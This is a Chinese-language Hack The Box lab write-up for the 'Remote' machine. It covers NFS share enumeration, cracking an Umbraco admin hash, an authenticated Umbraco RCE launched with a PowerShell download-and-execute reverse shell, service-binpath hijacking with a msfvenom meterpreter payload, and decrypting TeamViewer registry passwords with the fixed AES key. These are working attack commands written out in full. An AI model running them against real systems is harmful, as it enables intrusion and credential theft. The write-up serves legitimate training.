【HTB】Remote(umbraco RCE;服务提权:UsoSvc;TeamViewer)

免责声明

本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。

服务探测

先看看开了哪些端口,这台机器有防ping处理,因此要加上参数-Pn

┌──(root💀kali)-[~/htb/Remote]
└─# nmap -p- -Pn 10.10.10.180 --open
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-25 03:59 EST
Nmap scan report for 10.10.10.180
Host is up (0.28s latency).
Not shown: 65528 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
111/tcp   open  rpcbind
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
49666/tcp open  unknown

查看对应端口详细信息

┌──(root💀kali)-[~/htb/Remote]
└─# nmap -sV -Pn -T4 -A -O 10.10.10.180 -p 21,80,111,135,445,2049,49666
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-26 03:32 EST
Nmap scan report for 10.10.10.180
Host is up (0.35s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
49666/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): AVtech embedded (87%)
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-12-26T08:33:54
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   349.23 ms 10.10.14.1
2   349.45 ms 10.10.10.180

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 287.16 seconds

FTP

ftp可以匿名登录,但貌似没有东西,也不可以上传

┌──(root💀kali)-[~/htb/Remote]
└─# ftp 10.10.10.180                                                                                                                                 
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.

目录发现

80端口打开后像是一个介绍页面,没发现有啥有用的东西,尝试爆破

┌──(root💀kali)-[~/htb/Remote]
└─# gobuster dir -u http://10.10.10.180 -w /usr/share/wordlists/Web-Content/common.txt -t 30 --no-error
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.180
[+] Method:                  GET
[+] Threads:                 30
[+] Wordlist:                /usr/share/wordlists/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/25 04:01:07 Starting gobuster in directory enumeration mode
===============================================================
/Home                 (Status: 200) [Size: 6703]
/Blog                 (Status: 200) [Size: 5011]
/Contact              (Status: 200) [Size: 7890]
/Products             (Status: 200) [Size: 5338]
/blog                 (Status: 200) [Size: 5001]
/contact              (Status: 200) [Size: 7880]
/home                 (Status: 200) [Size: 6703]
/install              (Status: 302) [Size: 126] [--> /umbraco/]
/intranet             (Status: 200) [Size: 3323]               
/master               (Status: 500) [Size: 3420]               
/people               (Status: 200) [Size: 6739]               
/person               (Status: 200) [Size: 2741]               
/products             (Status: 200) [Size: 5328]               
/product              (Status: 500) [Size: 3420]               
/render/https://www.google.com (Status: 400) [Size: 3420]      
/umbraco              (Status: 200) [Size: 4040]

存在一个叫umbraco的cms,继续爆破

┌──(root💀kali)-[~/htb/Remote]
└─# gobuster dir -u http://10.10.10.180/umbraco -w /usr/share/wordlists/Web-Content/common.txt -t 30 --no-error
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.180/umbraco
[+] Method:                  GET
[+] Threads:                 30
[+] Wordlist:                /usr/share/wordlists/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/25 04:08:38 Starting gobuster in directory enumeration mode
===============================================================
/Default              (Status: 200) [Size: 4040]
/Members              (Status: 301) [Size: 159] [--> http://10.10.10.180/umbraco/Members/]
/Search               (Status: 301) [Size: 158] [--> http://10.10.10.180/umbraco/Search/] 
/actions              (Status: 301) [Size: 159] [--> http://10.10.10.180/umbraco/actions/]
/application          (Status: 200) [Size: 2455]                                          
/assets               (Status: 301) [Size: 158] [--> http://10.10.10.180/umbraco/assets/] 
/config               (Status: 301) [Size: 158] [--> http://10.10.10.180/umbraco/config/] 
/controls             (Status: 301) [Size: 160] [--> http://10.10.10.180/umbraco/controls/]
/create               (Status: 301) [Size: 158] [--> http://10.10.10.180/umbraco/create/]  
/dashboard            (Status: 301) [Size: 161] [--> http://10.10.10.180/umbraco/dashboard/]
/default              (Status: 200) [Size: 4040]                                            
/developer            (Status: 301) [Size: 161] [--> http://10.10.10.180/umbraco/developer/]
/dialogs              (Status: 301) [Size: 159] [--> http://10.10.10.180/umbraco/dialogs/]  
/install              (Status: 301) [Size: 159] [--> http://10.10.10.180/umbraco/install/]  
/js                   (Status: 301) [Size: 154] [--> http://10.10.10.180/umbraco/js/]       
/lib                  (Status: 301) [Size: 155] [--> http://10.10.10.180/umbraco/lib/]      
/masterpages          (Status: 301) [Size: 163] [--> http://10.10.10.180/umbraco/masterpages/]
/members              (Status: 301) [Size: 159] [--> http://10.10.10.180/umbraco/members/]    
/plugins              (Status: 301) [Size: 159] [--> http://10.10.10.180/umbraco/plugins/]    
/preview              (Status: 302) [Size: 125] [--> /umbraco]                                
/render/https://www.google.com (Status: 400) [Size: 3420]                                     
/search               (Status: 301) [Size: 158] [--> http://10.10.10.180/umbraco/search/]     
/settings             (Status: 301) [Size: 160] [--> http://10.10.10.180/umbraco/settings/]   
/views                (Status: 301) [Size: 157] [--> http://10.10.10.180/umbraco/views/]      
/webservices          (Status: 301) [Size: 163] [--> http://10.10.10.180/umbraco/webservices/]

谷歌搜索发现umbraco的7.12.4版本存在一个RCE,但是需要账号和密码。

NFS Service

2049端口是一个NFS Service,查看靶机的分享目录

┌──(root💀kali)-[~/htb/Remote]
└─# showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

有一个分享文件夹,mount到本地访问:

mount -t nfs 10.10.10.180:/site_backups /mnt/myshare -o nolock

查看分享内容:

┌──(root💀kali)-[~/htb/Remote]
└─# ls /mnt/myshare 
App_Browsers  App_Plugins    bin     css           Global.asax  scripts  Umbraco_Client  Web.config
App_Data      aspnet_client  Config  default.aspx  Media        Umbraco  Views

Web.config确认cms版本号为:7.12.4,正是上面存在rce的版本

查找分享目录内含有pass字样文件

┌──(root💀kali)-[/mnt/myshare]
└─# find ./|xargs grep -ri 'pass' -l                                                              130 ⨯
./App_Data/Logs/UmbracoTraceLog.intranet.txt
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19
./App_Data/Models/all.generated.cs
./App_Data/Models/models.generated.cs

App_Data/Logs/UmbracoTraceLog.intranet.txt下找到一个登陆用户名:admin@htb.local

再次查找分享目录内含有admin@htb.local字样文件

┌──(root💀kali)-[/mnt/myshare]
└─# find ./|xargs grep -ri 'admin@htb.local' -l                                                   130 ⨯
./App_Data/Logs/UmbracoTraceLog.intranet.txt
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19
./App_Data/Logs/UmbracoTraceLog.remote.txt
./App_Data/Umbraco.sdf

App_Data/Umbraco.sdf下找到相关字样,把这个文件重定向到kali

strings App_Data/Umbraco.sdf >/root/htb/Remote/umbraco.txt

查看文件:

┌──(root💀kali)-[~/htb/Remote]
└─# head umbraco.txt 
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
@{pv
qpkaj

可以看到爆出了几个用户名,哈希密码,以及哈希算法,整理如下

  1. 用户名:admin@htb.local
    哈希:b8be16afba8c314ad33d812f22a04991b90e2aaa
    哈希算法:SHA1
  1. 用户名:smith@htb.local
    哈希:jxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts=
    哈希算法:HMACSHA256
  1. 用户名:ssmith@htb.local
    哈希:8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA=
    哈希算法:HMACSHA256

解出来用户admin@htb.local密码哈希明文:baconandcheese

上面用户凭据可以登录cms

webshell

谷歌搜索,使用这个exp

开启一个监听:

nc -lnvp

攻击:

┌──(root💀kali)-[~/htb/Remote]
└─# python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180/' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8000/Invoke-PowerShellTcp.ps1')"

收到一个反弹shell:

┌──(root💀kali)-[~]
└─# nc -lnvp 4242                     
listening on [any] 4242 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.180] 49724
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv>

C:\users\public下拿到user.txt

提权

传winpeas到靶机

(new-object System.Net.WebClient).DownloadFile('http://10.10.14.3:8000/winPEASx64.exe','C:\users\public\winPEASx64.exe')

执行:

& "C:\users\public\winPEASx64.exe"

服务提权

发现拥有开启和关闭一个RmSvc服务的权限

Modifiable Services
Z% Check if you can modify any service https://book.hacktricks.xyz/windows/windows-loc
al-privilege-escalation#services                                                                        
    LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
    RmSvc: GenericExecute (Start/Stop)
    UsoSvc: AllAccess, Start

PS下查看这个服务的信息

PS C:\> sc.exe qc UsoSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: UsoSvc
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs -p
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem

修改这个服务二进制文件的路径

PS C:\> sc.exe config UsoSvc binpath= "C:\Users\Public\shell.exe"
[SC] ChangeServiceConfig SUCCESS

编译一个反弹shell文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe -o shell.exe

下载到靶机

(new-object System.Net.WebClient).DownloadFile('http://10.10.14.3:8000/shell.exe','C:\users\public\shell.exe')

重启服务

net stop UsoSvc
net start UsoSvc

拿到反弹shell

 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] Sending stage (200262 bytes) to 10.10.10.180
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.180:49863) at 2021-12-26 11:20:13 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

服务提权的shell是非常不稳定的,一会就断,必须迁移进程到其他常驻进程(这里要拼一下手速,试多几次,一般都可以)

先用ps命令查看当前有哪些进程

迁移到稳定的进程

meterpreter > migrate 640
[*] Migrating from 5656 to 640...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

TeamViewer

查看网络连接

Current TCP Listening Ports
Check for services restricted from the outside 
  Enumerating IPv4 connections
                                                                                                                                                                                                                   
  Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name

  TCP        127.0.0.1             2049          0.0.0.0               0               Listening         4               System
  TCP        127.0.0.1             5939          0.0.0.0               0               Listening         2264            TeamViewer_Service

看到有两个端口是向本地开启的,2049端口我们知道是nfs,5939端口我们看到是TeamViewer

根据这篇文章所示,teamviewer将用户名密码硬编码至注册表中,加密算法是:AES-128-CBC

其中key的值:0602000000a400005253413100040000,iv的值:0100010067244F436E6762F25EA8D704 是固定的

TeamViewer stored user passwords encrypted with AES-128-CBC with they key of 0602000000a400005253413100040000 and iv of 0100010067244F436E6762F25EA8D704 in the Windows registry. If the password is reused anywhere, privilege escalation is possible. If you do not have RDP rights to machine but TeamViewer is installed, you can use TeamViewer to remote in. TeamViewer also lets you copy data or schedule tasks to run through their Service, which runs as NT AUTHORITY\SYSTEM, so a low privilege user can immediately go to SYSTEM with a .bat file. This was assigned CVE-2019-18988.

查看注册表中TeamViewer的信息

PS C:\Program Files (x86)\TeamViewer\Version7> reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
    StartMenuGroup    REG_SZ    TeamViewer 7
    InstallationDate    REG_SZ    2020-02-20
    InstallationDirectory    REG_SZ    C:\Program Files (x86)\TeamViewer\Version7
    Always_Online    REG_DWORD    0x1
    Security_ActivateDirectIn    REG_DWORD    0x0
    Version    REG_SZ    7.0.43148
    ClientIC    REG_DWORD    0x11f25831
    PK    REG_BINARY    BFAD2AEDB6C89AE0A0FD0501A0C5B9A5C0D957A4CC57C1884C84B6873EA03C069CF06195829821E28DFC2AAD372665339488DD1A8C85CDA8B19D0A5A2958D86476D82CA0F2128395673BA5A39F2B875B060D4D52BE75DB2B6C91EDB28E90DF7F2F3FBE6D95A07488AE934CC01DB8311176AEC7AC367AB4332ABD048DBFC2EF5E9ECC1333FC5F5B9E2A13D4F22E90EE509E5D7AF4935B8538BE4A606AB06FE8CC657930A24A71D1E30AE2188E0E0214C8F58CD2D5B43A52549F0730376DD3AE1DB66D1E0EBB0CF1CB0AA7F133148D1B5459C95A24DDEE43A76623759017F21A1BC8AFCD1F56FD0CABB340C9B99EE3828577371B7ADA9A8F967A32ADF6CF062B00026C66F8061D5CFF89A53EAE510620BC822BC6CC615D4DE093BC0CA8F5785131B75010EE5F9B6C228E650CA89697D07E51DBA40BF6FC3B2F2E30BF6F1C01F1BC2386FA226FFFA2BE25AE33FA16A2699A1124D9133F18B50F4DB6EDA2D23C2B949D6D2995229BC03507A62FCDAD55741B29084BD9B176CFAEDAAA9D48CBAF2C192A0875EC748478E51156CCDD143152125AE7D05177083F406703ED44DCACCD48400DD88A568520930BED69FCD672B15CD3646F8621BBC35391EAADBEDD04758EE8FC887BACE6D8B59F61A5783D884DBE362E2AC6EAC0671B6B5116345043257C537D27A8346530F8B7F5E0EBACE9B840E716197D4A0C3D68CFD2126E8245B01E62B4CE597AA3E2074C8AB1A4583B04DBB13F13EB54E64B850742A8E3E8C2FAC0B9B0CF28D71DD41F67C773A19D7B1A2D0A257A4D42FC6214AB870710D5E841CBAFCD05EF13B372F36BF7601F55D98ED054ED0F321AEBA5F91D390FF0E8E5815E6272BA4ABB3C85CF4A8B07851903F73317C0BC77FA12A194BB75999319222516
    SK    REG_BINARY    F82398387864348BAD0DBB41812782B1C0ABB9DAEEF15BC5C3609B2C5652BED7A9A07EA41B3E7CB583A107D39AFFF5E06DF1A06649C07DF4F65BD89DE84289D0F2CBF6B8E92E7B2901782BE8A039F2903552C98437E47E16F75F99C07750AEED8CFC7CD859AE94EC6233B662526D977FFB95DD5EB32D88A4B8B90EC1F8D118A7C6D28F6B5691EB4F9F6E07B6FE306292377ACE83B14BF815C186B7B74FFF9469CA712C13F221460AC6F3A7C5A89FD7C79FF306CEEBEF6DE06D6301D5FD9AB797D08862B9B7D75B38FB34EF82C77C8ADC378B65D9ED77B42C1F4CB1B11E7E7FB2D78180F40C96C1328970DA0E90CDEF3D4B79E08430E546228C000996D846A8489F61FE07B9A71E7FB3C3F811BB68FDDF829A7C0535BA130F04D9C7C09B621F4F48CD85EA97EF3D79A88257D0283BF2B78C5B3D4BBA4307D2F38D3A4D56A2706EDAB80A7CE20E21099E27481C847B49F8E91E53F83356323DDB09E97F45C6D103CF04693106F63AD8A58C004FC69EF8C506C553149D038191781E539A9E4E830579BCB4AD551385D1C9E4126569DD96AE6F97A81420919EE15CF125C1216C71A2263D1BE468E4B07418DE874F9E801DA2054AD64BE1947BE9580D7F0E3C138EE554A9749C4D0B3725904A95AEBD9DACCB6E0C568BFA25EE5649C31551F268B1F2EC039173B7912D6D58AA47D01D9E1B95E3427836A14F71F26E350B908889A95120195CC4FD68E7140AA8BB20E211D15C0963110878AAB530590EE68BF68B42D8EEEB2AE3B8DEC0558032CFE22D692FF5937E1A02C1250D507BDE0F51A546FE98FCED1E7F9DBA3281F1A298D66359C7571D29B24D1456C8074BA570D4D0BA2C3696A8A9547125FFD10FBF662E597A014E0772948F6C5F9F7D0179656EAC2F0C7F
    LastMACUsed    REG_MULTI_SZ    \0005056B91D2C
    MIDInitiativeGUID    REG_SZ    {514ed376-a4ee-4507-a28b-484604ed0ba0}
    MIDVersion    REG_DWORD    0x1
    ClientID    REG_DWORD    0x6972e4aa
    CUse    REG_DWORD    0x1
    LastUpdateCheck    REG_DWORD    0x611bbaed
    UsageEnvironmentBackup    REG_DWORD    0x1
    SecurityPasswordAES    REG_BINARY    FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
    MultiPwdMgmtIDs    REG_MULTI_SZ    admin
    MultiPwdMgmtPWDs    REG_MULTI_SZ    357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
    Security_PasswordStrength    REG_DWORD    0x3

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\AccessControl
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\DefaultSettings

留意SecurityPasswordAES的值FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B

使用以下脚本解密,填上以上哈希值:

import sys, hexdump, binascii
from Crypto.Cipher import AES

class AESCipher:
    def __init__(self, key):
        self.key = key

    def decrypt(self, iv, data):
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self.cipher.decrypt(data)

key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
hex_str_cipher = "FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B"         # output from the registry

ciphertext = binascii.unhexlify(hex_str_cipher)

raw_un = AESCipher(key).decrypt(iv, ciphertext)

print(hexdump.hexdump(raw_un))

password = raw_un.decode('utf-16')
print(password)

执行

┌──(root💀kali)-[~/htb/Remote]
└─# python3 teamviewer_hash_decrypt.py
00000000: 21 00 52 00 33 00 6D 00  30 00 74 00 65 00 21 00  !.R.3.m.0.t.e.!.
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
None
!R3m0te!

解密出来以后得到密码:!R3m0te!

测试这个密码是否可用于smb登录

┌──(root💀kali)-[~/htb/Remote]
└─# crackmapexec smb 10.10.10.180 -u administrator -p '!R3m0te!'                                                                                                                                             130 ⨯
SMB         10.10.10.180    445    REMOTE           [*] Windows 10.0 Build 17763 x64 (name:REMOTE) (domain:remote) (signing:False) (SMBv1:False)
SMB         10.10.10.180    445    REMOTE           [+] remote\administrator:!R3m0te! (Pwn3d!)

显示可以登录。

使用psexec.py登录

┌──(root💀kali)-[~/htb/Remote]
└─# python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator@10.10.10.180
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.180.....
[*] Found writable share ADMIN$
[*] Uploading file lKlgqvNl.exe
[*] Opening SVCManager on 10.10.10.180.....
[*] Creating service TJiQ on 10.10.10.180.....
[*] Starting service TJiQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

总结

ftp寻找初始shell的时候没有用处,但是后来从靶机传文件到kali分析的时候派上了用场,当然传文件的方法还有很多,因靶机开启的服务而异。
服务提权其实可以避免使用metsploit,思路是传nc.exe到靶机反弹回来应该可以得到一个稳定的shell
有趣的靶机,TeamViewer的提权有学到东西。

©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 206,723评论 6 481
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 88,485评论 2 382
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 152,998评论 0 344
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 55,323评论 1 279
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 64,355评论 5 374
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,079评论 1 285
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,389评论 3 400
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,019评论 0 259
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 43,519评论 1 300
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,971评论 2 325
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,100评论 1 333
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,738评论 4 324
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,293评论 3 307
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,289评论 0 19
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,517评论 1 262
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,547评论 2 354
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,834评论 2 345

推荐阅读更多精彩内容